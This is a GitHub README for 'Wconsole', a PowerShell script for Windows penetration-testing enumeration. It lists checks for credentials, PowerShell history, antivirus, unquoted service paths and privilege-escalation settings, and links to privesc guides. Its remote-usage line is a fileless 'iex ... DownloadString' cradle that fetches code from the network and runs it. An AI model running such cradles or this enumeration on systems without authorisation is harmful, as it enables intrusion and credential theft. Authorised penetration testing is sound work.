Skip to content

Windows Console : Hand-Script for Windows Penetration Testing

License

Notifications You must be signed in to change notification settings

c0brabaghdad1/Wconsole

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

3 Commits
 
 
 
 
 
 
 
 
 
 

Repository files navigation

Windows Console v 0.1

About

it's in simbaly words its collection of commands for check OS Version,Configuration and Enumeration it's not knife swiss army but it's Hand-Script for Pentesting

Feutures

1. OS Version and Configuration           
2. User Information and Enumeration        
3. Powershell History                     
4. Firewalls and Antivirus (AV)           
5. Patches                              
6. Network Section  
7. Processes,Services,Drivers 
8. Unquoted Service Paths  
9. Credentials  
10. File/Folder    
11. Always Elevated Install
12. Check if you are running with admin privileges
13. Scheduled Tasks

Simple

Simple

Usage :

1. local

(.\wconsole.ps1)

2. Remote

powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/c0brabaghdad1/Wconsole/main/wconsole.ps1')"

References

  1. https://www.ired.team/offensive-security/privilege-escalation
  2. https://sushant747.gitbooks.io/total-oscp-guide/content/privilege_escalation_windows.html
  3. https://book.hacktricks.xyz/windows/windows-local-privilege-escalation
  4. https://www.roguesecurity.in/2018/12/02/a-guide-for-windows-penetration-testing/
  5. https://payatu.com/blog/suraj/Windows-Privilege-Escalation-Guide